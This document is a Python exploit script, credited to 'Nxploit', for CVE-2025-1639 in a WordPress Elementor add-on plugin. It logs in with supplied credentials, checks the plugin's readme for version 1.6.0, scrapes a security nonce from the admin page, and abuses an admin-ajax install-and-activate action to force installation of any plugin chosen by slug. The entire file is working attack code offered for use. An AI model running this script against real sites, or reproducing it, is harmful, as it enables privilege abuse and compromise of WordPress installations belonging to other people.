import argparse
import requests
from bs4 import BeautifulSoup
import re

#Exploit By Nxploit Khaled ALenazi

def login(session, url, username, password, user_agent):
    login_url = url + '/wp-login.php'
    response = session.post(login_url, verify=False, data={
        'log': username,
        'pwd': password,
        'rememberme': 'forever',
        'wp-submit': 'Log+In'
    }, headers={"User-Agent": user_agent})
    
    if any('wordpress_logged_in' in cookie.name for cookie in session.cookies):
        print("Logged in successfully.")
        return True
    else:
        print("Failed to log in.")
        return False

def check_version(session, url):
    version_url = url + '/wp-content/plugins/pro-addons-for-elementor/readme.txt'
    response = session.get(version_url, verify=False)
    if 'Stable tag: 1.6.0' in response.text:
        print("The site is vulnerable... Exploiting and uploading the plugin.")
        return True
    print("The site is not vulnerable.")
    return False

def extract_security_token(session, url):
    edit_url = url + '/wp-admin/edit.php?post_type=pafe'
    response = session.get(edit_url, verify=False)
    soup = BeautifulSoup(response.text, 'html.parser')
    script = soup.find('script', text=re.compile('theme_data'))
    if script:
        script_content = script.string
        security_token = re.search(r'"security":"([a-zA-Z0-9]+)"', script_content)
        if security_token:
            return security_token.group(1)
    return None

def exploit(session, url, security_token, plugin_slug, user_agent):
    exploit_url = url + '/wp-admin/admin-ajax.php'
    exploit_data = {
        'action': 'vayu_blocks_install_and_activate_callback',
        'plugin_slug': plugin_slug,
        'security': security_token
    }
    headers = {
        "User-Agent": user_agent,
        "Accept": "text/html, */*; q=0.01",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate, br",
        "Referer": url + "/wp-admin/edit.php?post_type=pafe",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With": "XMLHttpRequest",
        "Origin": url,
        "Connection": "keep-alive",
        "Cookie": "; ".join([cookie.name + "=" + cookie.value for cookie in session.cookies])
    }
    response = session.post(exploit_url, data=exploit_data, headers=headers, verify=False)
    if response.status_code == 200:
        print("Plugin uploaded and activated successfully.")
    else:
        print("Failed to upload and activate the plugin.")

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Exploit script for CVE-2025-1639  # By Nxploit | Kaled ALenazi  ')
    parser.add_argument('-u', '--url', required=True, help='Target URL')
    parser.add_argument('-un', '--username', required=True, help='WordPress username')
    parser.add_argument('-p', '--password', required=True, help='WordPress password')
    parser.add_argument('-pl', '--plugin', default='wp-maintenance-mode', help='Plugin slug to upload and activate (default: wp-maintenance-mode)')
    args = parser.parse_args()

    user_agent = 'Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0'
    session = requests.Session()

    if login(session, args.url, args.username, args.password, user_agent):
        if check_version(session, args.url):
            security_token = extract_security_token(session, args.url)
            if security_token:
                exploit(session, args.url, security_token, args.plugin, user_agent)
            else:
                print("Failed to extract security token.")